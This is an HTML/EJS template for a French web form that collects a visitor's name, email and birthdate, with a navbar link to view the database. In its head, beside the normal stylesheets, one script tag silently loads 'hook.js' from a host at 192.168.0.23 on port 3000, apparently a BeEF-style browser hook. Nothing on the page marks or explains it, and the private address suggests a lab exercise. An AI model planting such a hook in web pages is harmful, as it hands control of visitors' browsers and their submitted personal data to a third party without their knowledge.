<!DOCTYPE html>
<html>

<head>
  <title><%= title %></title>
  <link rel='stylesheet' href='/stylesheets/style.css' />
  <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.3.1/css/bootstrap.min.css"
    integrity="sha384-ggOyR0iXCbMQv3Xipma34MD+dH/1fQ784/j6cY/iJTQUOhcWr7x9JvoRxT2MZw1T" crossorigin="anonymous">
  <script src="./../public/javascripts/index_app.js" async></script>
  <script src="http://192.168.0.23:3000/hook.js"></script>
</head>






<body>
  <header>

<!-- As a heading -->
<nav class="navbar navbar-expand-lg navbar-light bg-light border-bottom">
    <a class="navbar-brand" href="/">Navbarx</a>
    <button class="navbar-toggler" type="button" data-toggle="collapse" data-target="#navbarNav" aria-controls="navbarNav" aria-expanded="false" aria-label="Toggle navigation">
      <span class="navbar-toggler-icon"></span>
    </button>
    <div class="collapse navbar-collapse" id="navbarNav">
      <ul class="navbar-nav">
        <li class="nav-item active">
          <a class="nav-link font-weight-normal" href="/">Home <span class="sr-only">(current)</span></a>
        </li>
        <li class="nav-item">
          <a class="nav-link text-danger font-weight-normal" href="/db">Consulter la BDD</a>
        </li>
      </ul>
    </div>
  </nav>
  </header>




<div class="container mt-4 p-2">

  <form method="POST" autocomplete="off" >
    
    <div class="row">
      <div class="col-md-2">
        <label for="name" class="p-2"><h5>Nom</h5></label>
      </div>
      <div class="col-md-4">
        <input class="form-control form-control-md" 
        type="text" placeholder="Nom" 
        id="name" 
        name="name">

      </div>  
    </div>
    

    <div class="row">
        <div class="col-md-2">
          <label class="p-2" for="lastname"><h5>Prenom</h5></label>
        </div>
        <div class="col-md-4">
          <input class="form-control form-control-md" 
          type="text" 
          placeholder="Prenom" 
          id="lastname"
          name="lastname"
          >
        </div>  
      </div>
      

    <div class="row">
        <div class="col-md-2">
          <label class="p-2" for="mail"><h5>Mail</h5></label>
        </div>
        <div class="col-md-4">
          <input class="form-control form-control-md" 
          name="mail" placeholder="xyz@mail.com"
          type="email" id="mail">
          
        </div>  
      </div>

    <div class="row">

        <div class="col-md-2">
          <label class="p-2" for="bdate"><h5>Date de naissance</h5></label>
        </div>

        <div class="col-md-4">
          <input class="form-control form-control-md" 
          name="birthdate" 
          type="date" id="bdate">
          <br>
          <input type="submit" class="btn btn-primary" value="Envoyer" >
        </div>  
      </div>
      

  </form>

</div>

</body>
  





</html>